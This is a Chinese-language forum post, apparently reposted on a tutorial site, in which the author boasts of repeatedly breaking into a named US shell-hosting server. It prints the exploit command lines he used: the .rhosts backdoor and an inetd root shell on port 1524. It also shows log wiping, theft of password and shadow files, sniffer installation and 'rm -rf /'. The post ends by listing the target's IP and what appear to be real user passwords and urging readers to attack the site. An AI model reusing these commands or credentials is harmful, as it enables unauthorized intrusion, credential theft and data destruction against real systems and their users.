网站入侵,入侵美国网站

入侵美国网站 - 网络安全 - 电脑教程网

入侵美国网站

日期:2006-05-19   荐:
转自:黑色海岸线

安全--到底是该由实战来检验呢?还是由口水来检验?这个问题对于某些人来说,确实可以争论得上或许几百年。俺可没有这个闲工夫,拿这些时间去提高一下自己的技术还好些。
可以这样说:如果没有当年Morris在UNIX的下的WORM,恐怕今天的各种病毒以及与WORM异曲同工、以消耗系统资源进而拖垮系统服务的DoS攻击等都不知要等到多少年之后才能出现;同样,如果没有当年的Finger攻击哪能引出今天那么多的Remote
EXPloits?
总之,机算机的安全恐怕还会停留在当时UNIX的那种login管理,drwxrwxrwx和系统进程空间用户进程空间井水不犯河水--越界就Core
Dumped状态。 妈妈呀,这种安全机制,经过付出不菲的代价后,今天看来是何等的脆弱。
喜欢做马谡的人啊,请不要那么自以为是。也许就有那么一天,当你的系统被搞垮掉的时候,你就等待着不仅仅是所有的人对你的嘲笑吧!
  好了,言归正题。 以下是俺经历过的一个美国站点,至于系统管理员,俺只能用"可恶"来形容。 io.jtan.com
207.106.84.135
那是去年11月底的事。一个偶然的机会,给俺扫到了这个地址,当然当时不是这个IP,给俺搅活了一阵,后来换成这个。
用rpcinfo一看,呵呵,还开了不少RPC daemons,
乖乖,有这个机会俺可不能不试一下--狗日的. 找一个老的Remote Exploit,
就ttdbserver(100083)吧,找个台湾的SUNOS机子做跳板,编译后 $./ttdb 207.106.84.135
"echo "+ +">/usr/.rhosts;" 呵呵,竟然攻击成功! 看到这,如果你不去他们的 www.jtan.com
上看还好,看过后,我想你如果是在美国的话,你绝对是不会花钱去用他们的shell站点的。这么破,还敢吹他们的shell帐号服务是安全的,也真厚。@#$%^!
我是不会用 $rlogin -l bin 207.106.84.135 上去的。 还是下面的省事 $./ttdb
207.106.84.135 "echo "ingreslock stream tcp nowait root /bin/sh sh
-i" > /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;" 然后
$telnet 207.106.84.135 1524 #w 有root 简单打扫一下, #rm /core; #cp
/dev/null /var/adm/messages; #rm /usr/bin/.rhosts; #kill -9 XXXXXX
(你的1524端口shell进程号) 抓取passwd, shadow, hosts文件 当时时间已很晚了,美国那边是白天,只好退出。
第二天拿解出的普通用户密码从正门进入,也是用一个老的local exploit:ufsrestore, 竟然也拿到了root.
打扫完后,忍不住装了个sniffer。
第三天上去,拿到了十几个本地用户的密码,和几个telnet到别的主机的用户密码。有鉴于是商业站点,好心发了个mail给系统管理员(TMD,真是好心过头了)
我想系统管理员都这德性,比如说你试着用密码admin登录admin帐户,结果进去了。如果你好心报告给他的话,那么你的麻烦也就开始了。请相信我,这是定律。
第四天上去,漏洞是补上了。多余的RPC daemon也关掉了。 $ls -la /usr/lib/fs/ufs/ufs*
好,让我再试一下别的local exploit, 记得我有一个放在备用目录下, 好就运行它。 $%BACKUP_DIR/my_ex
File not found. ls -la %BACKUP_DIR/my_ex -rwxr-xr-x 23456 my_ex
..... 明明在那里,怎么会 not found? 这时我的telnet进程被killed掉。 再telnet
207.106.84.135进入,一大堆警告垃极 换个跳板再Telnet, 以另一用户身分进入。 cat
$BACKUP_DIR/my_exp SHIT! 已被换成了Shell Scripts,
内容当然是有人运行该程序,就把当前的系统状态报告(EMAIL)给系统管理员!可笑的是后面都用XXX来填满文件的原有长度。
查看一下该用户的mail,
有一封竟然是系统管理员如何如何历害发现内部有人在偷取用户密码,要求用户换改密码。完全掩盖了系统不安全,被人潜入的真相。对用户太不负责了。@#$%!,本来俺也就打算不玩了,看了之后,好!有你这样的系统管理员,俺也乐着跟你逗一下。
  接下来直到今年二月底,是轮番的攻防战,俺也后悔跟他太明刀明枪了,几次拿到root之后都主动指明给他,也许是出于道德上的心里障碍,没有发Broadcasting
email告知他们的用户。也许是过分的好心,非但没有唤醒他们对用户的负责,反而从另一个角度是害了用户。直到后来,所知的漏洞被他一一补上。而我的愤怒,也逐步升级到真想拿到root后,来个
# nohup rm -rf / & 把它给超度掉。 随着难度的提高,加上工作忙,也就不玩了近五个月。君子报仇,十年不晚。:)
昨晚突然心血潮,再Telnet上去看了一下。妈呀!不知在这五个月中,该站点得罪了何方神圣,除了给人DoS拖慢它的服务外,还或许是 rm
-rf /
过了。他们还到FBI报了案,但说不能指望FBI破案,要靠他们自己来搞定云云。也许实际情况比他们在email中所说给用户听的更为严重。呵呵!有人竞然帮俺超度了它,太不好玩了。

[1] [2]  

俺再用一个自己认为是个很臭的Exploit来弄它一下,我KAO, # 这是什么? 当时脑海里涌现了"rm -rf
/"这个能够冲洗掉我的一切对那个系统管理员的愤怒的字符串。也许是已经五个月了,愤怒的极点已经过去,也许是考虑到他已经得到了应有的惩罚。
总之是"心太软",我没有这样做。
后来,在寻找xferlog的时候给他追到了。原来"他"--也许是雇了"高手"坐镇,在用户登录后运行的.profile里面放了通知"他"的Shell
Script, 这一点可以值得借鉴。所以每一用户登录,"他"都会立刻知道。 攻难守易,尤其是在计算机的安全方面。不知各位是否同意?
反正今晚我再上去的时候,还被"他"DoS了我的跳板站点,telnet特慢。 --
说人家干那事,"卿卿"原来也再干那事。美国佬,真TM虚伪无耻!
以下是该站点的一些资料,功夫可以的朋友,不妨到那里实战一下,绝对是一个很好的练兵场。同时请各位要注意保护好自己。水平欠佳的朋友千万别试。
io.jtan.com 207.106.84.135 SUNOS 5.5.1 N:bet P:bet N:home P:home
N:jo P:tomster .profile 中的 sendmail [email protected] 为发email通知系统管理员
chris $cat /etc/aliases 可以看到各个管理员的ID。 注意:用户进入后用的是ksh $mail
应该可看到我提到的信。 对该系统有何心得,不妨拿到这来交流交流。有利大家的提高。 请注意他们是否拥有跟踪login到跳板机器的技术。
拿到root后,请别忘了告诉俺。我想到时,你会量变到要来个"rm -rf /"的。 不然的话,会象俺那么后悔。

(出处:http://www.sheup.com)


 [1] [2] 

以下是该站点的一些资料,功夫可以的朋友,不妨到那里实战一下,绝对是一个很好的练兵场。同时请各位要注意保护好自己。水平欠佳的朋友千万别试。
io.jtan.com 207.106.84.135 SUNOS 5.5.1 N:bet P:bet N:home P:home
N:jo P:tomster .profile 中的 sendmail [email protected] 为发email通知系统管理员
chris $cat /etc/aliases 可以看到各个管理员的ID。 注意:用户进入后用的是ksh $mail
应该可看到我提到的信。 对该系统有何心得,不妨拿到这来交流交流。有利大家的提高。 请注意他们是否拥有跟踪login到跳板机器的技术。
拿到root后,请别忘了告诉俺。我想到时,你会量变到要来个"rm -rf /"的。 不然的话,会象俺那么后悔。

(出处:http://www.sheup.com)


 [1] [2] [3] 

标签: